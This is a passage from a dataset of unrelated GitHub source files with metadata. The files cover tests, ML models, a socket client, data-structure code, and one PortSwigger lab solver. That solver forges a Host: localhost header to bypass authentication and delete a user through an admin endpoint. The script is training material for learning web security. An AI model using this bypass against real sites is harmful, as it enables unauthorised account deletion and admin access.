this token somewhere\n os.environ['ASANA_TOKEN'] = json.dumps(token) # (see below)\n\n if not client or not client.session.authorized:\n print(\"COULD NOT AUTHORIZE\")\n exit(1)\n\n # Summarize the project.\n summarize(client, args.project_to_summarize, args.summary_project)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Asana/python-asana","sub_path":"examples/example-summary-task.py","file_name":"example-summary-task.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":281,"dataset":"github-code","pt":"6"} +{"seq_id":"72532827709","text":"# pylint:disable=unused-variable\n# pylint:disable=unused-argument\n# pylint:disable=redefined-outer-name\n# pylint:disable=no-value-for-parameter\n# pylint:disable=too-many-arguments\n\nimport json\nimport logging\nfrom typing import Any, AsyncIterator, Awaitable, Callable, Iterator\nfrom unittest import mock\n\nimport aiopg.sa\nimport pytest\nimport sqlalchemy as sa\nfrom aiohttp.test_utils import TestClient\nfrom faker import Faker\nfrom models_library.projects import ProjectAtDB, ProjectID\nfrom pytest_mock.plugin import MockerFixture\nfrom pytest_simcore.helpers.utils_login import UserInfoDict\nfrom servicelib.aiohttp.application_keys import APP_DB_ENGINE_KEY\nfrom simcore_postgres_database.models.comp_pipeline import StateType\nfrom simcore_postgres_database.models.comp_tasks import NodeClass, comp_tasks\nfrom simcore_postgres_database.models.users import UserRole\nfrom simcore_service_webserver.db_listener._db_comp_tasks_listening_task import (\n create_comp_tasks_listening_task,\n)\nfrom tenacity._asyncio import AsyncRetrying\nfrom tenacity.before_sleep import before_sleep_log\nfrom tenacity.retry import retry_if_exception_type\nfrom tenacity.stop import stop_after_delay\nfrom tenacity.wait import wait_fixed\n\nlogger = logging.getLogger(__name__)\n\n\n@pytest.fixture\nasync def mock_project_subsystem(\n mocker: MockerFixture,\n) -> AsyncIterator[dict[str, mock.MagicMock]]:\n mocked_project_calls = {}\n\n mocked_project_calls[\"update_node_outputs\"] = mocker.patch(\n \"simcore_service_webserver.db_listener._db_comp_tasks_listening_task.update_node_outputs\",\n return_value=\"\",\n )\n\n mocked_project_calls[\"_get_project_owner\"] = mocker.patch(\n 
\"simcore_service_webserver.db_listener._db_comp_tasks_listening_task._get_project_owner\",\n return_value=\"\",\n )\n mocked_project_calls[\"_update_project_state\"] = mocker.patch(\n \"simcore_service_webserver.db_listener._db_comp_tasks_listening_task._update_project_state\",\n return_value=\"\",\n )\n\n yield mocked_project_calls\n\n\n@pytest.fixture\nasync def comp_task_listening_task(\n mock_project_subsystem: dict, client: TestClient\n) -> AsyncIterator:\n assert client.app\n async for _comp_task in create_comp_tasks_listening_task(client.app):\n # first call creates the task, second call cleans it\n yield\n\n\n@pytest.fixture\ndef comp_task(\n postgres_db: sa.engine.Engine,\n) -> Iterator[Callable[..., dict[str, Any]]]:\n created_task_ids: list[int] = []\n\n def creator(project_id: ProjectID, **task_kwargs) -> dict[str, Any]:\n task_config = {\"project_id\": f\"{project_id}\"} | task_kwargs\n with postgres_db.connect() as conn:\n result = conn.execute(\n comp_tasks.insert()\n .values(**task_config)\n .returning(sa.literal_column(\"*\"))\n )\n new_task = result.first()\n assert new_task\n new_task = dict(new_task)\n created_task_ids.append(new_task[\"task_id\"])\n return new_task\n\n yield creator\n\n # cleanup\n with postgres_db.connect() as conn:\n conn.execute(\n comp_tasks.delete().where(comp_tasks.c.task_id.in_(created_task_ids))\n )\n\n\n@pytest.mark.parametrize(\n \"task_class\", [NodeClass.COMPUTATIONAL, NodeClass.INTERACTIVE, NodeClass.FRONTEND]\n)\n@pytest.mark.parametrize(\n \"update_values, expected_calls\",\n [\n pytest.param(\n {\n \"outputs\": {\"some new stuff\": \"it is new\"},\n },\n [\"_get_project_owner\", \"update_node_outputs\"],\n id=\"new output shall trigger\",\n ),\n pytest.param(\n {\"state\": StateType.ABORTED},\n [\"_get_project_owner\", \"_update_project_state\"],\n id=\"new state shall trigger\",\n ),\n pytest.param(\n {\"outputs\": {\"some new stuff\": \"it is new\"}, \"state\": StateType.ABORTED},\n [\"_get_project_owner\", \"update_node_outputs\", \"_update_project_state\"],\n id=\"new output and state shall double trigger\",\n ),\n pytest.param(\n {\"inputs\": {\"should not trigger\": \"right?\"}},\n [],\n id=\"no new output or state shall not trigger\",\n ),\n ],\n)\n@pytest.mark.parametrize(\"user_role\", [UserRole.USER])\nasync def test_listen_comp_tasks_task(\n mock_project_subsystem: dict,\n logged_user: UserInfoDict,\n project: Callable[..., Awaitable[ProjectAtDB]],\n pipeline: Callable[..., dict[str, Any]],\n comp_task: Callable[..., dict[str, Any]],\n comp_task_listening_task: None,\n client,\n update_values: dict[str, Any],\n expected_calls: list[str],\n task_class: NodeClass,\n faker: Faker,\n):\n db_engine: aiopg.sa.Engine = client.app[APP_DB_ENGINE_KEY]\n some_project = await project(logged_user)\n pipeline(project_id=f\"{some_project.uuid}\")\n task = comp_task(\n project_id=f\"{some_project.uuid}\",\n node_id=faker.uuid4(),\n outputs=json.dumps({}),\n node_class=task_class,\n )\n async with db_engine.acquire() as conn:\n # let's update some values\n await conn.execute(\n comp_tasks.update()\n .values(**update_values)\n .where(comp_tasks.c.task_id == task[\"task_id\"])\n )\n\n # tests whether listener gets executed\n for call_name, mocked_call in mock_project_subsystem.items():\n if call_name in expected_calls:\n async for attempt in AsyncRetrying(\n wait=wait_fixed(1),\n stop=stop_after_delay(10),\n retry=retry_if_exception_type(AssertionError),\n before_sleep=before_sleep_log(logger, logging.INFO),\n reraise=True,\n ):\n with 
attempt:\n mocked_call.assert_awaited()\n\n else:\n mocked_call.assert_not_called()\n","repo_name":"ITISFoundation/osparc-simcore","sub_path":"services/web/server/tests/unit/with_dbs/01/notifications/test_notifications__db_comp_tasks_listening_task.py","file_name":"test_notifications__db_comp_tasks_listening_task.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"17523043430","text":"def run():\n ###### 0123456789012345678901234567890123456789012345678'\n record = '....................100 .......513.25 ..........'\n\n # Old Code\n cost = int(record[20:23]) * float(record[31:37])\n print(cost)\n\n # New Code\n SHARES = slice(20, 23)\n PRICE = slice(31, 37)\n cost = int(record[SHARES]) * float(record[PRICE])\n print(cost)\n\n\nif __name__ == '__main__':\n \"\"\"\n Problem: Program has become unreadable and you want to\n clean it up.\n \n Notes: This cleans the code up and makes it more clear as\n to what chunk of the data is.\n \"\"\"\n run()\n","repo_name":"nplutt/learning","sub_path":"python_cookbook/chapter_1/naming_a_slice.py","file_name":"naming_a_slice.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24466797036","text":"from django.contrib.auth import logout\nfrom django.shortcuts import render, redirect\nfrom .forms import PetForm\nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\ndef addPet(request):\n\tprint(request.user)\n\tif request.method == 'POST':\n\t\tform = PetForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tpetToAdd = form.save(commit=False)\n\t\t\tpetToAdd.user = request.user\n\t\t\tpetToAdd.save()\n\t\t\treturn redirect('profileManager:profile')\n\telse:\n\t\tform = PetForm()\n\tcontext = {'form': form}\n\treturn render(request, 'app/petManager/addPet.html', context)\n","repo_name":"WSU-4110/Pet-Finder","sub_path":"petManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"75101345466","text":"import csv\nf = open(\"C:\\\\Users\\\\User\\Desktop\\WORK\\데이터분석\\DATA\\subwayfee.csv\", encoding = \"cp949\")\ndata = csv.reader(f)\nnext(data)\n\nmx = 0\nrate = 0\n\nfor row in data:\n for i in range(4, 8):\n row[i] = int(row[i])\n if row[6] != 0:\n rate = row[4] / row[6]\n if rate > mx :\n mx = rate\nprint(mx)","repo_name":"dasfef/Chungbuk_Univ_BigData","sub_path":"day03/day03_subwayfee.py","file_name":"day03_subwayfee.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1584376551","text":"import unittest\nimport sys\nimport time\nimport os\n\n\ndef target():\n time.sleep(0.5)\n\n\nclass TestThreadNames(unittest.TestCase):\n def setUp(self):\n try:\n del sys.modules[\"threading\"]\n except KeyError:\n pass\n\n def test_unpatched(self):\n import threading\n self.assertFalse(hasattr(threading.Thread.start, \"_namedthreads_patched\"))\n thread = threading.Thread(target=target, name=\"mysupersleepythread\")\n thread.start()\n # wait_for_thread(thread)\n thread_status = get_thread_status()\n self.assertNotIn(\"mysupersleepythread\", thread_status)\n thread.join()\n\n def test_patched(self):\n import namedthreads\n self.assertTrue(namedthreads.patch())\n\n import threading\n\n 
self.assertTrue(hasattr(threading.Thread.start, \"_namedthreads_patched\"))\n        thread = threading.Thread(target=target, name=\"mysupersleepythread\")\n        thread.start()\n        # wait_for_thread(thread)\n        thread_status = get_thread_status()\n        self.assertNotIn(\"mysupersleepythread\", thread_status)\n        self.assertIn(\"mysupersleepyth\", thread_status)\n        thread.join()\n\n\ndef get_thread_status():\n    s_pid = str(os.getpid())\n    thread_id = int(list(p for p in os.listdir(\"/proc/{}/task\".format(s_pid)) if p != s_pid)[0])\n    with open(\"/proc/{}/task/{}/status\".format(s_pid, thread_id), mode=\"r\") as f:\n        return f.read()\n\n\ndef wait_for_thread(thread_obj):\n    for i in range(10):\n        if thread_obj.is_alive():\n            return\n        time.sleep(0.1)\n    assert False\n\nif __name__ == '__main__':\n    unittest.main()","repo_name":"beniwohli/namedthreads","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"24295363215","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 11 11:30:12 2022\r\n\r\n@author: 253364\r\n\"\"\"\r\n\r\nimport random\r\n\r\nclass Target():\r\n    \r\n    def __init__(self,x, y, width, height):\r\n        self.x = x\r\n        self.y = y \r\n        self.width = width\r\n        self.height = height\r\n        self.hitbox = (self.x, self.y, self.width, self.height)\r\n    \r\n    \r\n    ","repo_name":"sliverpool555/Biods-Project","sub_path":"Target.py","file_name":"Target.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38036727876","text":"#!/usr/bin/env python3\r\n# Host header authentication bypass\r\n# Lab-Link: https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass\r\n# Difficulty: APPRENTICE\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n\r\n\r\ndef delete_user(client, host, username):\r\n    url = f'{host}/admin/delete?username={username}'\r\n\r\n    # Use a prepared request to keep the cookie values and just replace the host header\r\n    req = requests.Request('GET', url)\r\n    prep = client.prepare_request(req)\r\n    prep.headers['Host'] = 'localhost'\r\n    r = client.send(prep, allow_redirects=False)\r\n    return r.status_code == 302\r\n\r\n\r\ndef main():\r\n    print('[+] Host header authentication bypass')\r\n    try:\r\n        host = sys.argv[1].strip().rstrip('/')\r\n    except IndexError:\r\n        print(f'Usage: {sys.argv[0]} ')\r\n        print(f'Example: {sys.argv[0]} http://www.example.com')\r\n        sys.exit(-1)\r\n\r\n    with requests.Session() as client:\r\n        client.verify = False\r\n        client.proxies = proxies\r\n\r\n        # Get the cookies required\r\n        client.get(host)\r\n\r\n        username = 'carlos'\r\n        if not delete_user(client, host, username):\r\n            print(f'[-] Failed to delete user {username}')\r\n            sys.exit(-5)\r\n        print(f'[+] Deletion of {username} appears successful')\r\n\r\n        # I sometimes had issues getting the proper result, so wait briefly before checking\r\n        time.sleep(2)\r\n        if 'Congratulations, you solved the lab!' 
not in client.get(f'{host}').text:\r\n print(f'[-] Failed to solve lab')\r\n sys.exit(-9)\r\n\r\n print(f'[+] Lab solved')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"frank-leitner/portswigger-websecurity-academy","sub_path":"20_HTTP_host_header_attacks/Host_header_authentication_bypass/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"6"} +{"seq_id":"36285648166","text":"# prediction\nimport os\nimport json\nimport http\nfrom sklearn.externals import joblib\n\nclf = joblib.load(os.path.join(os.environ.get('ABEJA_TRAINING_RESULT_DIR', '.'), 'model.pkl'))\nprint(clf)\n\n\ndef decode_predictions(result):\n categories = {\n 0: 'False',\n 1: 'True',\n }\n result_with_labels = [{\"toxic\": categories[i], \"probability\": score} for i, score in enumerate(result)]\n return sorted(result_with_labels, key=lambda x: x['probability'], reverse=True)\n\n\ndef handler(request, context):\n req_data = json.load(request)\n print(req_data)\n comment = req_data['comment']\n print(comment)\n result = clf.predict_proba([comment])[0]\n print(result)\n sorted_result = decode_predictions(result.tolist())\n\n return {\n 'status_code': http.HTTPStatus.OK,\n 'content_type': 'application/json; charset=utf8',\n 'content': {\"result\": sorted_result}\n }\n","repo_name":"abeja-inc/Platform_handson","sub_path":"toxic_comment_classification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42307353121","text":"import psutil\nimport sys\n\nclass HashTable:\n def __init__(self):\n self.buckets = 8\n self.initStorage()\n self.size = 0\n self.shouldResize = True\n self.total = 0\n self.max = 0\n self.mostCommon = ''\n\n def initStorage(self):\n self.storage = []\n for i in range(self.buckets):\n self.storage.append([])\n \n def hash(self, key, buckets):\n hash = 5381\n for i in range(len(key)):\n char = ord(key[i])\n hash = ((hash * 32) + hash) + char\n return hash % buckets\n\n def insertAndUpdateCounts(self, key):\n self.insert(key, 1)\n self.total += 1\n count = self.getCount(key)\n if count > self.max:\n self.max = count\n self.mostCommon = key\n\n def insert(self, key, value):\n index = self.hash(key, self.buckets)\n chain = self.storage[index]\n for i in range(len(chain)):\n if chain[i][0] == key:\n chain[i][1] += value\n return\n if psutil.virtual_memory().available < sys.getsizeof([key, value]):\n raise MemoryError('Not enough memory to add ' + key)\n chain.append([key, value])\n self.size += 1\n if self.shouldResize:\n self.resize()\n\n def getCount(self, key):\n index = self.hash(key, self.buckets)\n chain = self.storage[index]\n for i in range(len(chain)):\n if chain[i][0] == key:\n return chain[i][1]\n return None\n\n def resize(self):\n loadFactor = self.size / self.buckets\n if loadFactor >= 0.75 and sys.getsizeof(self.storage) * 4 < psutil.virtual_memory().available:\n self.shouldResize = False\n localStorage = []\n self.deepCopy(self.storage, localStorage)\n self.buckets *= 2\n self.initStorage()\n self.size = 0\n self.rehash(localStorage)\n self.shouldResize = True\n\n def deepCopy(self, globalStorage, localStorage):\n for i in range(len(globalStorage)):\n localStorage.append([])\n chain = globalStorage[i]\n for j in range(len(chain)):\n localStorage[i].append([chain[j][0], chain[j][1]])\n\n def rehash(self, localStorage):\n for i 
in range(len(localStorage)):\n            chain = localStorage[i]\n            for j in range(len(chain)):\n                self.insert(chain[j][0], chain[j][1])","repo_name":"JohnLeMieux/IDbyDNA","sub_path":"hashTable.py","file_name":"hashTable.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72143002748","text":"import numpy as np\nimport pandas as pd\n\nimport random\n# this is a basic implementation of the k_means algorithm\n\nclass KMeans():\n    def __init__(self, n_classes, logger=None, init_method='random', max_iter=10):\n        # set logger object, should be logging protocol compliant\n        self.logger = logger\n        self.n_classes = n_classes\n        self.max_iter = max_iter\n        # initialize centroids based on init_method\n        self.init_method = init_method\n\n    def fit(self, train_data, train_labels=None):\n        '''\n        train model based on the init method and the train data.\n        Will iterate over dataset for [max_iter]\n        if logger provided => will output iteration values\n        Params:\n        - train_data: numpy array of (n_obs, variables)\n        - train_labels: None (api consistency)\n        '''\n        possible_labels = [i for i in range(self.n_classes)]\n        self.space_dim = train_data.shape[1]\n        classification = []\n        self.centroids = []\n        # init labels\n        for entry in train_data:\n            label = random.choice(possible_labels)\n            classification.append((entry, label))\n\n        # iterate until convergence or max iterations\n        epoch = 0\n        prev_classification = None\n        while not self._check_converge(prev_classification, classification) and epoch < self.max_iter:\n            self.logger.info('[Training] epoch: {}'.format(epoch))\n            self.centroids = []\n            prev_classification = classification.copy()\n            classification = []\n\n            for label in possible_labels:\n                centroid = self._calculate_centroid(prev_classification, label)\n                self.centroids.append((label, centroid))\n            for entry in train_data:\n                new_label = self._classify_obs(entry, self.centroids)\n                classification.append((entry, new_label))\n            epoch += 1\n\n        self.logger.info('[Training] Done training, enjoy model predictions!')\n\n    def predict(self, data):\n        '''\n        Predict classification for dataset\n        Params:\n        - data: numpy array of shape (None, space_dim). Where space_dim is the same dim as training data\n\n        Returns:\n        - numpy array with given classifications in same order as data\n        '''\n        predictions = []\n        for entry in data:\n            pred = self._classify_obs(entry, self.centroids)\n            predictions.append(pred)\n\n        return np.array(predictions)\n\n    def _calculate_centroid(self, observations, label):\n        '''\n        calculate the centroid for a label given observations\n        Params:\n        - observations: list of tuples (entry, label)\n        - label: the current label for which a centroid should be calculated\n\n        Returns:\n        - a list of size len(entry) representing a coordinate in the given space\n        '''\n        # centroid is the mean value of all points\n        centroid = np.zeros(self.space_dim)\n        amount_of_entries = 0\n\n        for entry, current_label in observations:\n            if current_label == label:\n                centroid += entry\n                amount_of_entries += 1\n\n        if amount_of_entries > 0:\n            centroid /= amount_of_entries\n        return centroid\n\n    def _classify_obs(self, entry, centroids):\n        '''\n        Classify an entry given all centroids by least euclidean distance to each one\n        Params:\n        - entry: array like object\n        - centroids: list of tuples (label, point). 
Where point is an array\n        like object representing a point in the same space as entry\n\n        Returns:\n        - the label of the closest centroid\n        '''\n        distances_tuples = []\n        for label, point in centroids:\n            # numpy norm is l2, that's why this is the same as euclidean distance\n            distance = np.linalg.norm(entry - point)\n            distances_tuples.append((distance, label))\n        min_tuple = min(distances_tuples, key = lambda t: t[0])\n        return min_tuple[1]\n\n\n    def _check_converge(self, prev_classification, new_classification):\n        '''\n        Checks whether both classifications are equal\n        Params:\n        - prev_classification: list of tuples (entry, label)\n        - new_classification: list of tuples (entry, label)\n        Returns:\n        - bool: true if both lists are equal, false if not\n        '''\n        if prev_classification is None or new_classification is None:\n            return False\n\n        for idx in range(len(prev_classification)):\n            entry, prev_label = prev_classification[idx]\n            entry, new_label = new_classification[idx]\n            if prev_label != new_label:\n                return False\n\n        return True\n","repo_name":"levensworth/unsupervised_tp","sub_path":"models/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30043941644","text":"import socket\nimport sctp\nimport threading\nimport time\n\n\ndef send_command(address):\n    print(\"Iniciando conexao com servidor: \" + address)\n    if protocol == 'udp':\n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\n        sock.sendto(command.encode('utf-8'), (address, port))\n        if command == 'run':\n            data, address = sock.recvfrom(4096)\n            print(data.decode('utf-8'))\n        if command == 'test':\n            for i in range(1, 10000):\n                sock.sendto(str.encode(str(i)), (address, port))\n            last = \"fim\"\n            sock.sendto(last.encode('utf-8'), (address, port))\n    elif protocol == 'tcp':\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.connect((address, port))\n        sock.send(str.encode(command))\n        if command == 'run':\n            print(\"Aguardando resposta...\")\n            data = sock.recv(4096)\n            print(data.decode('utf-8'))\n        elif command == 'test':\n            for i in range(1, 10000):\n                sock.send(str.encode(str(i)))\n                time.sleep(0.005)\n            last = \"fim\"\n            sock.send(str.encode(last))\n    elif protocol == 'sctp':\n        sock = sctp.sctpsocket_tcp(socket.AF_INET)\n        sock.connect((address, port))\n        sock.sctp_send(command)\n        if command == 'run':\n            print(\"Aguardando resposta...\")\n            data = sock.recv(4096)\n            print(data.decode('utf-8'))\n        elif command == 'test':\n            for i in range(1, 10000):\n                sock.send(str.encode(str(i)))\n            last = \"fim\"\n            sock.send(str.encode(last))\n    sock.close()\n\n\ndef call_thread(serverList):\n    for addresses in serverList:\n        thread = threading.Thread(target=send_command, args=(addresses,))\n        threads.append(thread)\n        thread.start()\n\n\nport = 4444\nthreads = list()\nlistaServidores = list()\nprotocol = 'udp'\nopcao = \"\"\n\nprint(\"\\n[1] Adicionar servidor\\n\"\n      \"[2] Remover servidor\\n\"\n      \"[3] Mostrar lista de servidores\\n\"\n      \"[4] Enviar comando para lista de servidores\\n\"\n      \"[5] Selecionar protocolo\\n\"\n      \"[6] Sair\\n\")\n\nwhile (opcao != \"6\"):\n    opcao = input(\"\\nDigite uma opcao: \")\n    if (opcao == \"1\"):\n        sv = input(\"Digite o endereço do servidor: \")\n        listaServidores.append(sv)\n    elif (opcao == \"2\"):\n        sv = input(\"Digite o endereço do servidor para remover: \")\n        listaServidores.remove(sv)\n    elif (opcao == \"3\"):\n        print(listaServidores)\n    elif (opcao == \"4\"):\n        command = input(\"Digite o comando: \")\n        i = time.time()\n        
call_thread(listaServidores)\n for index, thread in enumerate(threads):\n thread.join()\n f = time.time()\n if command == \"test\":\n print(f\"O protocolo {protocol} levou {(f - i):.2f} segundos\")\n elif (opcao == \"5\"):\n new = \"\"\n while new.lower() not in ('udp', 'tcp', 'sctp'):\n new = input(\"Digite o protocolo desejado (UDP, TCP ou SCTP): \").lower()\n protocol = new\n print(\"Protocolo alterado: \" + protocol)\n","repo_name":"guilherme-poleto/Redes-de-computadores","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28184207519","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport pdb\nimport random\n\n\n__all__ = ['densenet']\n\n\nfrom torch.autograd import Variable\n\nclass Bottleneck(nn.Module):\n def __init__(self, inplanes, expansion=4, growthRate=12, dropRate=0):\n super(Bottleneck, self).__init__()\n planes = expansion * growthRate\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, growthRate, kernel_size=3, \n padding=1, bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.dropRate = dropRate\n\n def forward(self, x):\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n if self.dropRate > 0:\n out = F.dropout(out, p=self.dropRate, training=self.training)\n\n out = torch.cat((x, out), 1)\n\n return out\n\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, expansion=1, growthRate=12, dropRate=0):\n super(BasicBlock, self).__init__()\n planes = expansion * growthRate\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.conv1 = nn.Conv2d(inplanes, growthRate, kernel_size=3, \n padding=1, bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.dropRate = dropRate\n\n def forward(self, x):\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n if self.dropRate > 0:\n out = F.dropout(out, p=self.dropRate, training=self.training)\n\n out = torch.cat((x, out), 1)\n\n return out\n\n\nclass Transition(nn.Module):\n def __init__(self, inplanes, outplanes):\n super(Transition, self).__init__()\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.conv1 = nn.Conv2d(inplanes, outplanes, kernel_size=1,\n bias=False)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n out = F.avg_pool2d(out, 2)\n return out\n\n\nclass DenseNet(nn.Module):\n\n def __init__(self, depth=22, block=Bottleneck, \n dropRate=0, num_classes=10, growthRate=12, compressionRate=2):\n super(DenseNet, self).__init__()\n\n assert (depth - 4) % 3 == 0, 'depth should be 3n+4'\n n = (depth - 4) / 3 if block == BasicBlock else (depth - 4) // 6\n\n self.growthRate = growthRate\n self.dropRate = dropRate\n\n # self.inplanes is a global variable used across multiple\n # helper functions\n self.inplanes = growthRate * 2 \n self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, padding=1,\n bias=False)\n self.dense1 = self._make_denseblock(block, n)\n self.trans1 = self._make_transition(compressionRate)\n self.dense2 = self._make_denseblock(block, n)\n self.trans2 = self._make_transition(compressionRate)\n self.dense3 = self._make_denseblock(block, n)\n self.bn = nn.BatchNorm2d(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = 
nn.AvgPool2d(8)\n self.fc = nn.Linear(self.inplanes, num_classes)\n self.base = torch.nn.Parameter(torch.randn(200, self.inplanes))\n\n # Weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_denseblock(self, block, blocks):\n layers = []\n for i in range(blocks):\n # Currently we fix the expansion ratio as the default value\n layers.append(block(self.inplanes, growthRate=self.growthRate, dropRate=self.dropRate))\n self.inplanes += self.growthRate\n\n return nn.Sequential(*layers)\n\n def _make_transition(self, compressionRate):\n inplanes = self.inplanes\n outplanes = int(math.floor(self.inplanes // compressionRate))\n self.inplanes = outplanes\n return Transition(inplanes, outplanes)\n\n\n def forward(self, x):\n x = self.conv1(x)\n\n x = self.trans1(self.dense1(x)) \n x = self.trans2(self.dense2(x)) \n x = self.dense3(x)\n x = self.bn(x)\n x = self.relu(x)\n\n x = self.avgpool(x)\n x = x.view(x.size(0), -1)\n \n score = torch.mm( x, self.base.transpose(0, 1) )\n s1, s20 = torch.sort(score, 1)\n s1 = s1[:, -20:]\n s2 = s20[:, -20:]\n \n #s2 = s2.transpose(0, 1).unsqueeze(1)\n #s2 = list(s2)\n #random.shuffle(s2)\n #s2 = torch.cat(s2, 0).transpose(0, 1)\n \n #pdb.set_trace()\n s1 = torch.softmax(s1, 1)\n s1 = s1.unsqueeze(2).repeat(1, 1, self.inplanes)\n #pdb.set_trace()\n zero = torch.zeros(s2.size(0), 20, 200).cuda()\n zero.scatter_(2, s2.unsqueeze(2).long(), 1)\n zero = zero.reshape(-1, 200)\n get = torch.mm(zero, self.base)\n get = get.reshape(x.size(0), -1, self.base.size(1))\n #get = get[:, :, :100]\n #get = get.reshape(get.size(0), -1)\n get = torch.sum(s1 * get, 1)\n #x = self.fc(get)\n #pdb.set_trace()\n \n return x\n\n\ndef densenet(**kwargs):\n \"\"\"\n Constructs a ResNet model.\n \"\"\"\n return DenseNet(**kwargs)\n","repo_name":"morning-dews/PCL","sub_path":"pt_imagenet/dmodels/cifar/densenet.py","file_name":"densenet.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"71434010748","text":"# Convolutional Neural Network\n\n# Installing Theano\n# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\n\n# Installing Tensorflow\n# pip install tensorflow\n\n# Installing Keras\n# pip install --upgrade keras\n\n# Part 1 - Building the CNN\n\n# Importing the Keras libraries and packages\nimport tensorflow as tf\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nfrom tensorflow.contrib.keras.api.keras.callbacks import Callback\n\nclass LossHistory(Callback):\n def __init__(self):\n super().__init__()\n self.epoch_id = 0\n self.losses = ''\n \n def on_epoch_end(self, epoch, logs={}):\n self.losses += \"Epoch {}: accuracy -> {:.4f}, val_accuracy -> {:.4f}\\n\"\\\n .format(str(self.epoch_id), logs.get('acc'), logs.get('val_acc'))\n self.epoch_id += 1\n \n def on_train_begin(self, logs={}):\n self.losses += 'Training begins...\\n'\n\nclassifier = Sequential()\n\n#Adding convulution\nclassifier.add(Convolution2D(32,(3,3),input_shape=(64,64,3), activation='relu'))\n#Max Pooling Step,\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\n\n#Add 
another convolutional layer to further increase accuracy\nclassifier.add(Convolution2D(32,(3,3), activation='relu'))\n#Max Pooling Step,\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\n#Flattening step\nclassifier.add(Flatten())\n#Step 4 Fully Connect\nclassifier.add(Dense(activation='relu', units = 128))\n#One node expects dog or cat on this layer \nclassifier.add(Dense(activation='sigmoid', units = 1 ))\n\n#Compile the cnn\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n#Image preprocessing\nfrom keras.preprocessing.image import ImageDataGenerator\nbatch_size = 256\n\ntrain_datagen = ImageDataGenerator(\n        rescale=1./255,\n        shear_range=0.2,\n        zoom_range=0.2,\n        horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntraining_set = train_datagen.flow_from_directory(\n        'dataset/training_set',\n        target_size=(64, 64),\n        batch_size=batch_size,\n        class_mode='binary')\n\ntest_set = test_datagen.flow_from_directory(\n        'dataset/test_set',\n        target_size=(64, 64),\n        batch_size=batch_size,\n        class_mode='binary')\n\nimport tensorflow as tf\nhistory = 